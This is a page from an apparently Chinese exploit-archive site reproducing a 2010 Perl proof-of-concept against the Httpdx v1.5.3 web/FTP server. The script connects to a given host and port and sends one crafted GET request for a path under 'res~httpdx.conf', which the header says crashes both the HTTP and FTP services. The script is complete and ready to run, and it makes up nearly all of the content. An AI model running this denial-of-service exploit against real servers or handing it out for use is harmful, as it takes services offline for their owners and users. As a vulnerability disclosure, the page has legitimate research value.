首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Httpdx v1.5.3 Remote Break Server HTTP
来源:j.salwan@sysdream.com 作者:Salwan 发布时间:2010-03-19  

#!/usr/bin/perl
#
# Program          : Httpdx v1.5.3
# PoC     : Remote Break Services
# Homepage         : http://sourceforge.net/projects/httpdx/
# Found by         : Jonathan Salwan
# This Advisory    : Jonathan Salwan
# Contact          : j.salwan@sysdream.com
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.
#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.sysdream.com
# http://www.shell-storm.org
#
#


use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";

 if (@ARGV < 1)
  {
   print "[-] Usage: <file.pl> <host> <port>\n";
   print "[-] Exemple: file.pl 127.0.0.1 80\n";
   exit;
  }

 $ip = $ARGV[0];
 $port = $ARGV[1];


$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";
  
 print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
 $msg =  "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";
 $socket->send($msg);

print "\n[+] Done.\n\n";

close($socket);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZippHo 3.0.6 (.zip) 0day stack
·Xilisoft Video Converter(.yuv
·MediaCoder (.lst) file local B
·Realtek Media Player Playlist
·Win32 Mini HardCode WinExec&Ex
·Woltlab Burning Board Teamsite
·mplayer <= 4.4.1 NULL pointer
·Apple Safari <= Tag (heap spra
·myMP3-Player v3.0 (.m3u) Local
·eDisplay Personal FTP server 1
·Energizer DUO USB Battery Char
·eDisplay Personal FTP server 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved